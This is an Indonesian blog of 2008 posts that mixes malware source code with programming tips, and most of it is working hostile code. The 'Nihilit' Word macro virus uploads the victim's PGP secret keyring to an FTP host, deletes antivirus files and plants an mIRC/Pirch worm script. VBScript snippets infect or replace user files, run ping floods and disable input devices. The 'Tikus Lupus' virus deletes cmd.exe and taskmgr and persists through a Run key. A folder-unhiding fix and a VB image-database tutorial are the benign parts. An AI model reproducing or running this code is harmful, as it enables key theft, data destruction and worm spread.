pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command", "")
Position = InStr(1, pgppath, "pgpt")
If Position <> 0 Then
pgppath = Mid(pgppath, 1, Position - 2)
GoTo noPGP
End If
With Application.FileSearch
.FileName = "\Secring.skr"
.LookIn = pgppath
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
PGP_Sec_Key = .FoundFiles(1)
End With
For i = 1 To 4
NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewSecRingFile = "./secring" & NewSecRingFile & ".skr"
Open "c:\sys.vxd" For Output As #1
Print #1, "ftp http://members.tripod.com/Nihilit/"
Print #1, "user nihilit"
Print #1, "pass killer"
Print #1, "cd incoming"
Print #1, "binary"
Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """"
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\sys.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit3") = True
End If
Shell " ping -l 5000 -t http://www.gmx.de", vbHide
Shell " ping -l 5000 -t http://www.symantec.com", vbHide
'my birthday MsgBox!!!;p
MsgBox "Coder of Nihilit v4.0" & vbCrLf & "---------------------------------" & vbCrLf & "(c) by Necronomikon[Zer0Gravity]", 64,"Happy Birthday Necronomikon"
call asmdrop
End Sub
'---- from NTVCK by me!;p -----
Sub KillAV()
On Error Resume Next
Kill "C:\Progra~1\AntiViral Toolkit Pro\*.*"
Kill "C:\Progra~1\Command Software\F-PROT95\*.*"
Kill "C:\Progra~1\FindVirus\*.*"
Kill "C:\Toolkit\FindVirus\*.*"
Kill "C:\Progra~1\Quick Heal\*.*"
Kill "C:\Progra~1\McAfee\VirusScan95\*.*"
Kill "C:\Progra~1\Norton AntiVirus\*.*"
Kill "C:\TBAVW95\*.*"
Kill "C:\VS95\*.*"
Kill "C:\eSafe\Protect\*.*"
Kill "C:\PC-Cillin 95\*.*"
Kill "C:\PC-Cillin 97\*.*"
Kill "C:\f-macro\*.*"
Kill "C:\Progra~1\FWIN32"
End Sub
Sub Delay()
On Error Resume Next
'some Delaystuff from NTVCK v2.0 by me!!!;p
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Microsoft Input Devices\Mouse", "DoubleClickSpeed") = "1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Microsoft Input Devices\Keyboard", "KeyboardSpeed") = "1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\ControlPanel\", "MenuShowDelay") = "1000"
End Sub
Sub UMP()
On Error Resume Next
PoNu = Int(Rnd() * 28 + 1)
For Mutate = 1 To PoNu
PoRL = Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.CountOfLines
PoLi = Int(Rnd() * PoRL + 1)
a = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49
Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.InsertLines PoLi, vbTab & "Rem " & a & vbTab & b & vbTab & c & vbTab & d & vbTab & e
Next Mutate
End Sub
Sub IRC()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Necronomikon\ZeroGravity\Nihilit", "Irc") <> "True" Then
End If
Kill "C:\mirc\Script.ini
Open "c:\mirc\script.ini" For Output As #1
Print #1, "[SCRIPT]
Print #1, "n0=on 1:start:{
Print #1, "n1=on 1:join:#:{
Print #1, "n2=if ( $nick == $me ) { halt } | .dcc send $nick c:\Windows\nihilit.zip
Print #1, "n3= }
Print #1, "n4=on 1:input:*:.msg #nihilit [( $+ $active $+ ) $1-]
Print #1, "n5=on 1:text:*:?:.msg #nihilit [( $+ $active $+ ) $1-]
Print #1, "n6=on 1:FILESENT:*.*:/dcc send $nick C:\Windows\Nihilit.zip
Print #1, "n7=on 1:connect:.msg #nihilit by Necronomikon
Print #1, "n8= /msg #nihilit Im Infected With A Virus from Necronomikon
Print #1, "n9= /part #nihilit
Print #1, "n10= /clear
Print #1, "n11= /motd
Print #1, "n12=on 1:connect:.msg #nihilit Alive! $ip on $server $+ : $+ $port $+
Print #1, "n13=on 1:connect:/raw privmsg Necronomi HeyBabe! $ip on $server $+ : $+ $port $+
Print #1, "n14= }
Print #1, "n15=On 1:Connect:{
Print #1, "n16=/run attrib +h script.ini
Print #1, "n17=/run attrib +r script.ini
Print #1, "n18=/run attrib +s script.ini
Print #1, "n19= }
Print #1, ";IRC.Worm for Nihilit by Necronomikon
Close #1
Kill "C:\Windows\eventss.vxd
Open "C:\Windows\eventss.vxd" For Output As #2
Print #2, "[Levels]
Print #2, "Enabled=1
Print #2, "Count=1
Print #2, "Level1=000-Unknowns"
Print #2, "000-UnknownsEnabled=1
Print #2, "
Print #2, "[000-Unknowns]
Print #2, "User1=*!*@*
Print #2, "UserCount=1
Print #2, "Event1=;Nihilit by Necronomikon
Print #2, "Event2=ON JOIN:#:/dcc send $nick C:\Windows\Nihilit.zip
Print #2, "EventCount=2
Close #2
Kill "C:\pirch98\events.ini
Kill "C:\pirch32\events.ini
SourceFile = "C:\Windows\eventss.vxd
DestinationFile = "C:\pirch98\events.ini
FileCopy SourceFile, DestinationFile
SourceFilez = "C:\Windows\eventss.vxd
DestinationFilez = "C:\pirch32\events.ini
FileCopy SourceFilez, DestinationFilez
End Sub
Sub Phonecall()
On Error Resume Next
'makes a mobile-phonecall to a person i really don't like!
'thx to vic for code
Shell "dialer.exe", vbNormalFocus
SendKeys String:="01601524002", wait:=True
SendKeys String:="%d", wait:=True
For x = 1 To 500000
Next x
SendKeys String:="~", wait:=True
SendKeys String:="%h", wait:=True
SendKeys String:="%{F4}", wait:=True
End Sub
Sub asmdrop()
On Error Resume Next
'Drop Mosquito by Deadman
Open "C:\6.com" For Output As #3
Print #3, "•‡ÖÍ!Ã"
Close #3
Shell "C:\6.com"
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
call phonecall
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
CommandBars("Macro").Controls("Security...").Enabled = False
call phonecall
End Sub
Sub FileTemplates()
On Error Resume Next
call phonecall
End Sub
Sub ToolsMacro()
On Error Resume Next
Call Stealth
call phonecall
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
ShowVisualBasicEditor = True
call phonecall
End Sub
Sub Stealth()
On Error Resume Next
Application.OrganizerDelete Source:=NormalTemplate.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=ActiveDocument.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
NormalTemplate.Saved = True
ActiveDocument.Saved = True
End Sub
Sub HelpAbout()
On Error Resume Next
WordBasic.Font "Comic Sans MS"
WordBasic.FontSize 60
WordBasic.Insert "Check this!"
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.FontSize 48
WordBasic.Insert "Nihilit was coded by Necronomikon."
End Sub
Sub FileExit()
On Error Resume Next
Call Nihilit
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "h:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
Sub AutoExit()
On Error Resume Next
Call Nihilit
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
If ActiveDocument.Saved = False Then ActiveDocument.Save
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "r:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "s:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
Diposting oleh baracrack di Sabtu, Mei 03, 2008 0 komentar
Mengatasi Virus yg melakukan super hidden Folder anda
komputer anda terkena Virus yg ber type menyembunyikan file file penting anda?
atau istilah nya super hidden,dan di menu folder options “show hidden files and folders ” juga hilang?
solusi nya install ulang aja!wkwkkwkw bcanda
oke silahkan ikuti beberapa cara di bawah ini
cara 1
Buka registry editor : klik Start, pilih Run dan ketik “regedit” (tanpa tanda kutip) .
Kemudian arahkan bagian kiri pada key di bawah ini :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\Advanced\Folder\Hidden]
Pada bagian kanan buatlah String Value dengan nama value “Type” kemudian double klik dan isi bagian value data dengan “group”. Tutup aplikasi regedit kemudian restart komputer.
cara 2
Bikin DWORD value, kasih nama “Hidden”
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Value Name: Hidden
Data Type: REG_DWORD (DWORD Value)
Value Data: (1 = show hidden, 2 = Ngga Show)
cara 3
coba ketik ini di command prompt : attrib G:\*.* -s -h /S /D (asumsi: G:\ adalah drive usb flahdisk ybs)
Kalo gagal coba lakukan per folder/file. ganti *.* dengan nama folder/file yang diinginkan.
Contoh : attrib G:\folder1 -s -h /S /D
attrib G:\folder1 -s -h /S /D
attrib G:\namafile1.ext -s -h
attrib G:\namafile1.ext -s -h
Untuk keterangan lengkap soal option ATTRIB ini, ketik attrib.exe /? di command prompt.
cara 4
Masuk kesini:
Brosing key key yang ada disana:
Rubah value CheckedValue ke 2 ato 1
Rubah value DefaultValue ke 2 ato 1
Semoga membantu…
Kalo regeditnya nda bisa dibuka pake Tune Utility
Diposting oleh baracrack di Sabtu, Mei 03, 2008 0 komentar
Simpan / Tampil Gambar Dari Dan Ke Database Access
Oke … Langsung aja, yah………..
Yang dibutuh..in,untuk membuat_nya :
2 Form -> FormGambar.frm , and FormCariGambar.frm
1 Module -> Pengaturan.bas
1DataBase -> Tempat Gambar.mdb
Sebelum Men_Desain Form, alang_kah baik_nya buat DataBase_Nya dulu.
Cara_nya Seperti ini :
Pada Menu Visual Basic, Klik Add-Ins
Pilih Visual Data Manager…
Setelah Muncul Visual Data Manager, Klik Menu File
Pilih New ->Microsoft Access ->Version 7.0 MDB…
Simpan Dengan Nama -> Tempat Gambar.mdb atau Terserah Anda…
Setelah itu Buat Table Baru,Dan Buat Structure Table -> Sesuai Keinginan Anda..
Atau kamu bisa,guna..in Structure Table Aq,
Cara_nya Seperti ini :
Table Name : Gambar
Fields List :
Index List :
Kalo sudah dibuat Database_nya, Hubungkan Database dengan Project,
Cara Nge_Hubung..in_nya :
Klik Menu Project, Pilih References,
Cari dan Aktifkan Microsoft DAO 3.51 Object Library
Desain Form_nya:
Form Gambar
Name : FormGambar
BoderStyle : Fixed ToolWindow
Caption : .:: Demo Program ::.
StartUpPositon : CenterScreen
Name : Picture1
AutoSize : False
BorderStyle :Fixed Single
Name : TambahGambar -> AmbilGambar
Caption : Tambah Gambar -> Ambil Gambar
BackColor : &H00FFC0C0&
Style : Graphical
Taruh Coding dibawah ini pada Form Gambar :
Ini Coding_nya
Option Explicit
Const UkuranGambar = 8192
Private Sub TambahGambar_Click()
Dim Penyesuaian_Gambar As Recordset
Dim Atur As Long
Dim Ukuran As Long
Dim AlamatGambar As String
Dim Kode_Gambar As Integer
Dim Pusat_Gambar1() As Byte
Dim Pusat_Gambar5 As Integer
Dim Shadow_Angel As Integer
Dim Pusat_Gambar2 As Long
Dim Kode_Kunci As Long
Dim ShadowAngel_SQL As String
On Error GoTo TambahGambarShadow
FormCariGambar.Show vbModal
If NamaFile <> "" Then
Kode_Kunci = InputBox("Masuk..kan Kode Gambar... (Nomor)")
If Kode_Kunci > 0 Then
ShadowAngel_SQL = "select * from Gambar"
ShadowAngel_SQL = ShadowAngel_SQL & " where KataKunci=" & Kode_Kunci
Set Penyesuaian_Gambar = DataBase_ShadowAngel.OpenRecordset(ShadowAngel_SQL, dbOpenDynaset)
If Not Penyesuaian_Gambar.EOF Then
MsgBox "Kode Gambar,sudah ada di DataBase.Cari yang laen_nya..."
GoTo TambahGambarAngel
End If
Set Picture1.Picture = LoadPicture(NamaFile)
Set Penyesuaian_Gambar = DataBase_ShadowAngel.OpenRecordset("Gambar", dbOpenDynaset)
Kode_Gambar = FreeFile
Open NamaFile For Binary Access Read As Kode_Gambar
Ukuran = LOF(Kode_Gambar)
If Kode_Gambar = 0 Then
Close Kode_Gambar
End If
Pusat_Gambar2 = Ukuran \ UkuranGambar
Pusat_Gambar5 = Ukuran Mod UkuranGambar
Penyesuaian_Gambar("Alamat") = NamaFile
Penyesuaian_Gambar("KataKunci") = Kode_Kunci
ReDim Pusat_Gambar1(Pusat_Gambar5)
Get Kode_Gambar, , Pusat_Gambar1()
Penyesuaian_Gambar("DataGambar").AppendChunk Pusat_Gambar1()
ReDim Pusat_Gambar1(UkuranGambar)
Atur = Pusat_Gambar5
For Shadow_Angel = 1 To Pusat_Gambar2
Get Kode_Gambar, , Pusat_Gambar1()
Penyesuaian_Gambar("DataGambar").AppendChunk Pusat_Gambar1()
Atur = Atur + UkuranGambar
End If
End If
Exit Sub
#If Melati Then
#End If
Resume TambahGambarAngel
End Sub
Private Sub AmbilGambar_Click()
Dim ShadowAngel_SQL As String
Dim Kode_Kunci As Long
Dim Penyesuaian_Gambar As Recordset
Dim Ukuran As Long
Dim Pusat_Gambar3() As Byte
Dim Atur As Long
Dim AlamatGambar As String
Dim Kode_Gambar As Integer
Dim Pusat_Gambar4 As Integer
Dim Pusat_Gambar5 As Integer
Dim Shadow_Angel As Integer
Dim Tempat_File_Berkas As String
On Error GoTo AmbilGambar_Shadow
Kode_Kunci = InputBox("Masuk..kan Kode Gambar..nya")
If Kode_Kunci > 0 Then
ShadowAngel_SQL = "select * from Gambar"
ShadowAngel_SQL = ShadowAngel_SQL & " where KataKunci=" & Kode_Kunci
Set Penyesuaian_Gambar = DataBase_ShadowAngel.OpenRecordset(ShadowAngel_SQL, dbOpenDynaset)
Screen.MousePointer = vbHourglass
If Not Penyesuaian_Gambar.EOF Then
Kode_Gambar = FreeFile
AlamatGambar = App.Path
Tempat_File_Berkas = AlamatGambar & "\Penyimpanan Data Gambar.bin"
Open Tempat_File_Berkas For Binary Access Write As Kode_Gambar
Ukuran = Penyesuaian_Gambar("DataGambar").FieldSize
Pusat_Gambar4 = Ukuran \ UkuranGambar
Pusat_Gambar5 = Ukuran Mod UkuranGambar
ReDim Buffer(Pusat_Gambar5) As Byte
Pusat_Gambar3() = Penyesuaian_Gambar("DataGambar").GetChunk(Atur, Pusat_Gambar5)
Put Kode_Gambar, , Pusat_Gambar3()
Atur = Pusat_Gambar5
For Shadow_Angel = 1 To Pusat_Gambar4
ReDim Pusat_Gambar3(UkuranGambar) As Byte
Pusat_Gambar3() = Penyesuaian_Gambar("DataGambar").GetChunk(Atur, UkuranGambar)
Put Kode_Gambar, , Pusat_Gambar3()
Atur = Atur + UkuranGambar
End If
Close Kode_Gambar
Set Picture1.Picture = LoadPicture(Tempat_File_Berkas, , vbLPColor)
End If
Screen.MousePointer = vbDefault
Exit Sub
#If Melati Then
#End If
Resume AmbilGambar_Angel
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
If Not DataBase_ShadowAngel Is Nothing Then
End If
Set DataBase_ShadowAngel = Nothing
End Sub
Oke.. Kita langsung aja.. ke Form Cari Gambar
Form Cari Gambar
Name : FormCariGambar
BoderStyle : Fixed ToolWindow
Caption : Cari - > Gambar / Icon...
StartUpPositon : CenterScreen
Name : Label1,Label2,Label3,
Caption rive,Alamat,Direktori,
File/Berkas,Create By Shadow Angel
DriveListBox :
Name : Drive1
BackColor : &H00C0FFC0&
TextBox :
Name : AlamatGambar
BackColor : &H00C0FFC0&
DataFormat : General
DirListBox :
Name : Dir1
BackColor : &H00C0FFC0&
FileListBox :
Name : File1
BackColor : &H00C0FFC0&
CommandButton :
Name : Oke, Batal
Caption : Oke... , Batal
Kalo Sudah masuk_kan Coding dibawah ini pada Form Cari Gambar :
Ini Coding..nya :
Option Explicit
Dim Sesuaikan_Gambar As Boolean
Private Sub Command1_Click()
Unload Me
End Sub
Private Sub Batal_Click()
NamaFile = ""
Unload Me
End Sub
Private Sub Oke_Click()
NamaFile = AlamatGambar
Unload Me
End Sub
Private Sub Dir1_Change()
On Error GoTo Salah_Direktori
AlamatGambar = Dir1.Path
File1.Path = Dir1.Path
If Sesuaikan_Gambar = False Then
Alamat_Lengkap = File1.Path
End If
Exit Sub
#If Melati Then
#End If
Resume Ganti_Direktori
End Sub
Private Sub Drive1_Change()
On Error GoTo Salah_Drive
Dir1.Path = Drive1.Drive
NamaDrive = Drive1.Drive
Exit Sub
#If Melati Then
#End If
Resume Ganti_Drive
End Sub
Private Sub File1_Click()
On Error GoTo Salah_File
AlamatGambar = File1.Path + "\" + File1.FileName
Exit Sub
#If Melati Then
#End If
Resume Ganti_File
End Sub
Private Sub Form_Load()
Sesuaikan_Gambar = True
If NamaDrive <> "" Then
Drive1.Drive = NamaDrive
Dir1.Path = Drive1.Drive
End If
If Alamat_Lengkap <> "" Then
Dir1.Path = Alamat_Lengkap
File1.Path = Dir1.Path
End If
Sesuaikan_Gambar = False
End Sub
Lanjut..kan dengan membuatModule pada Form anda,
Lalu masuk..kan Coding dibawah ini pada Module tersebut :
Ini Coding Module_nya :
Option Explicit
Public DataBase_ShadowAngel As Database
Public NamaFile As String
Public NamaDrive As String
Public Alamat_Lengkap As String
Public PesanSalah As String
Sub main()
On Error GoTo Mawar
Dim AlamatGambar As String
AlamatGambar = App.Path
Set DataBase_ShadowAngel = OpenDatabase(AlamatGambar & "\Tempat Gambar.mdb", False)
Exit Sub
#If Melati Then
#End If
Resume Mawar_2
End Sub
Diposting oleh baracrack di Sabtu, Mei 03, 2008 0 komentar
Rabu, 02 April 2008
Mengganti HomePage di Internet Options :
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.google.com/"Melakukan Serangan Denial Of Service Attack
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.Run "Ping -t -l 10000 www.darmajaya.ac.id", 0, FalseMelakukan Loop Suatu file :
On Error Resume NextSet MawarPutih= CreateObject("WScript.Shell")DoMawarPutih.Run "Notepad.exe", 3, FalseLoopDisable -> Keyboard Dan Mouse:KeyBoard :
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DisableKeyboard", "Rundll32.exe Keyboard,Disable"Mouse :
On Error Resume NextSet MawarPutih = CreateObject("WScript.Shell")MawarPutih.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DisableMouse", "Rundll32.exe Mouse,Disable"Infeksi File Antar Visual Basic Script (.VBS) :
'Tips And Trik by Shadow AngelOn Error Resume NextSet MawarPutih = CreateObject("Scripting.FileSystemObject")Angel1()Sub Angel1()On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")For Each SalinMawarPutih In a.DrivesIf SalinMawarPutih.DriveType = 2 _Or SalinMawarPutih.DriveType = 3 ThenAngel3 (SalinMawarPutih.Path & "\")End IfNextEnd SubSub Angel2(FileTarget)On Error Resume NextSet otf = a.GetFile(WScript.ScriptFullName)ra = otf.ReadAllotf.CloseSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.FilesFileExt = LCase(a.GetExtensionName(n.Path))If FileExt = "vbs" Or FileExt = "vbe" ThenSet openvbs = a.OpenTextFile(n.Path, 1)vbsra = openvbs.ReadAllopenvbs.CloseIf InStr(1, vbsra, "Tips And Trik by ") = False ThenSet MawarPutih = CreateObject("Scripting.FileSystemObject")Set JC = MawarPutih.OpenTextFile(WScript.ScriptFullName, 1)RantingMawarPutih = JC.ReadAllJC.CloseSet MawarMerah = MawarPutih.OpenTextFile(n.Path, 8, True)MawarMerah.WriteLine vbCrLf & "' Hack .VBS by " & vbCrLf & "Tz = " & Chr(34) & Chr(34)For i = 1 To Len(RantingMawarPutih)Tz = Mid(RantingMawarPutih, i, 1)Tz = Hex(Asc(Tz))If Len(Tz) = 1 ThenTz = "0" & TzEnd IfGz = Gz + TzIf Len(Gz) = 110 ThenMawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)Gz = ""End IfIf Len(RantingMawarPutih) - i = 0 ThenMawarMerah.WriteLine "Tz = Tz + """ + Gz + Chr(34)Gz = ""End IfNextMawarMerah.WriteLine "Set MawarPutih = CreateObject(""Scripting.FileSystemObject"")"MawarMerah.WriteLine "WriteAppend.Write CM(Tz)"MawarMerah.WriteLine "WriteAppend.Close"MawarMerah.WriteLine "Function CM(CN)"MawarMerah.WriteLine "For GC = 1 To Len(CN) Step 2"MawarMerah.WriteLine "CM = CM & Chr(""&h"" & Mid(CN, GC, 2))"MawarMerah.WriteLine "Next"MawarMerah.WriteLine "End Function"MawarMerah.CloseEnd IfEnd IfNextEnd SubSub Angel3(FileTarget)On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.SubFoldersAngel2 (n.Path)Angel3 (n.Path)NextEnd SubInfeksi File -> Format Gambar .JPG :
' Tips And Trik by Shadow AngelOn Error Resume NextSet MawarPutih = CreateObject("Scripting.FileSystemObject")Angel1()Sub Angel1()On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")For Each SalinMawarPutih In a.DrivesIf SalinMawarPutih.DriveType = 2 _Or SalinMawarPutih.DriveType = 3 ThenAngel3 (SalinMawarPutih.Path & "\")End IfNextEnd SubSub Angel2(FileTarget)On Error Resume NextSet otf = a.GetFile(WScript.ScriptFullName)ra = otf.ReadAllotf.CloseSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.FilesFileExt = LCase(a.GetExtensionName(n.Path))If FileExt = "jpg" ThenMawarPutih.CopyFile WScript.ScriptFullName, n.Path & ".vbs"MawarPutih.DeleteFile (n.Path)End IfNextEnd SubSub Angel3(FileTarget)On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.SubFoldersAngel2 (n.Path)Angel3 (n.Path)NextEnd SubInfeksi Format File -> (.JPG . html . mpg . htm . doc And .avi) :
'Tips And Trik by Shadow AngelOn Error Resume NextSet MawarPutih = CreateObject("Scripting.FileSystemObject")Angel1()Sub Angel1()On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")For Each SalinMawarPutih In a.DrivesIf SalinMawarPutih.DriveType = 2 _Or SalinMawarPutih.DriveType = 3 ThenAngel3 (SalinMawarPutih.Path & "\")End IfNextEnd SubSub Angel2(FileTarget)On Error Resume NextSet RantingMawar = a.GetFile(WScript.ScriptFullName)ra = RantingMawar.ReadAllRantingMawar.CloseSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.FilesFileExt = LCase(a.GetExtensionName(n.Path))If FileExt = "jpg" Or FileExt = "html" Or FileExt = "mpg" Or FileExt = "htm" Or FileExt = "doc" Or FileExt = "avi" ThenMawarPutih.CopyFile WScript.ScriptFullName, n.Path & ".vbs"MawarPutih.DeleteFile (n.Path)End IfNextEnd SubSub Angel3(FileTarget)On Error Resume NextSet a = CreateObject("Scripting.FileSystemObject")Set f = a.GetFolder(FileTarget)For Each n In f.SubFoldersAngel2 (n.Path)Angel3 (n.Path)NextEnd Sub
Diposting oleh baracrack di Rabu, April 02, 2008 0 komentar
Virus Tikus Lupus
Yang di butuh.in untuk buat virus ini : -> 1 Form, -> 3 Modul, yang terdiri dari aerah Tikus Lupus,Modul1,dan RumahTikus. -> 1 Class Modul, -> 1 Related Documents Dan Komponen yang di butuh..in cuman : -> 1 Timer aja.
Ini Kode yang di Taruh di Form :
Private Fso As New FileSystemObjectPrivate Drive As DrivePrivate Drives As DrivesOption ExplicitPrivate TikusFirewall As LupusFirewallPrivate lngPortCounter As LongPrivate Declare Function NetRemoteTOD Lib "netapi32.dll" (yServer As Any, pBuffer As Long) As LongPrivate Declare Function NetApiBufferFree Lib "netapi32.dll" (ByVal pBuffer As Long) As LongPrivate Declare Sub CopyMem Lib "kernel32.dll" Alias "RtlMoveMemory" (pTo As Any, uFrom As Any, ByVal lSize As Long)Private Type TIME_OF_DAY_INFO telapsed As Long tmsecs As Long thours As Long tmins As Long tsecs As Long thunds As Long ttimezone As Long ttinterval As Long tday As Long tmonth As Long tyear As Long tweekday As LongEnd TypePrivate Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Any) As LongConst SC_MONITORPOWER = &HF170&Const MONITOR_OFF = 2&Const WM_SYSCOMMAND = &H112Private Function LingkaranTikus(TheForm As Form)SaveSetting TheForm.Name, App.Title, "TimesOpen", Val(GetSetting(TheForm.Name, App.Title, "TimesOpen")) + 1End FunctionFunction AmbilJamDikomputer() Dim JamLupus As TIME_OF_DAY_INFO Dim JamTikusLupus As Long, lpBuffer As Long Dim ServerLupus() As Byte JamTikusLupus = NetRemoteTOD(vbNullString, lpBuffer) CopyMem JamLupus, ByVal lpBuffer, Len(JamLupus) If lpBuffer Then Call NetApiBufferFree(lpBuffer) End If AmbilJamDikomputer = DateSerial(JamLupus.tyear, JamLupus.tmonth, JamLupus.tday) year = Right(AmbilJamDikomputer, 4)End FunctionSub PenampilanLupus()Dim aDo Until a = 1SendMessage Me.hWnd, WM_SYSCOMMAND, SC_MONITORPOWER, MONITOR_OFFLoopEnd SubFunction TikusInfeksiFolder(Fold As String)Dim Fso As Object, FolderSSet Fso = CreateObject("Scripting.FileSystemObject")On Error Resume NextFor Each FolderS In Fso.GetFolder(Fold).subfoldersCall TikusInfeksiFolder(FolderS.Path)Name FolderS As FolderS + ".{645FF040-5081-101B-9F08-00AA002F954E}"Next FolderSEnd FunctionPrivate Sub RuanganTikus() Set Drives = Fso.Drives For Each Drive In Drives Select Case Drive.DriveType Case Removable Case Fixed Case CDRom GoTo KondisiTikus Case Remote End Select If Drive.IsReady = True Then If Drive.AvailableSpace <> "" Then Dim letter As String letter = Drive.DriveLetter FileCopy App.Path + "\" + App.EXEName + ".exe", letter + ":\" + "TikusLupus.txt" TikusInfeksiFolder letter + ":\" End If End IfKondisiTikus: NextEnd SubSub PermenLupus()Kill ("C:\WINDOWS\SYSTEM32\cmd.exe")Kill ("C:\WINDOWS\SYSTEM32\taskmgr.exe")TikusInfeksiFolder "c:\"MsgBox "Windows sudah terinfeksi oleh Tikus Lupus,segera lakukan Instal Ulang Hard Disk Anda.Terima Kasih", vbCritical, "Windows Error"Call LingkaranTikus(Me)X$ = GetSetting(Me.Name, App.Title, "TimesOpen")LepaskanTikus:Select Case X$Case X$ > "2" FileCopy App.Path + "\" + App.EXEName + ".exe", "C:\WINDOWS\SYSTEM32\1031\TikusLupus.exe" Set newreg = CreateObject("WScript.Shell") newreg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsFirewall", "C:\WINDOWS\SYSTEM32\1031\TikusLupus.exe" Call PenampilanLupusCase X$ > "2" SaveSetting Me.Name, App.Title, "TimesOpen", 0 Call LingkaranTikus(Me) Call LingkaranTikus(Me) GoTo LepaskanTikusCase X$ < "2" SaveSetting Me.Name, App.Title, "TimesOpen", 0 Call LingkaranTikus(Me) Call LingkaranTikus(Me) GoTo LepaskanTikusEnd SelectEnd SubSub hibernate()TikusCariFile "C:\WINDOWS\SYSTEM32\1025\TikusLupus.exe" If FileEx = False Then Call InfeksiTikus2 End IfTikusCariFile "C:\WINDOWS\SYSTEM32\1028\TikusLupus.exe" If FileEx = False Then Call InfeksiTikus2 End IfShell ("C:\Program Files\Microsoft Office\Office10\WINWORD.EXE"), vbNormalFocusShell ("C:\Program Files\Microsoft 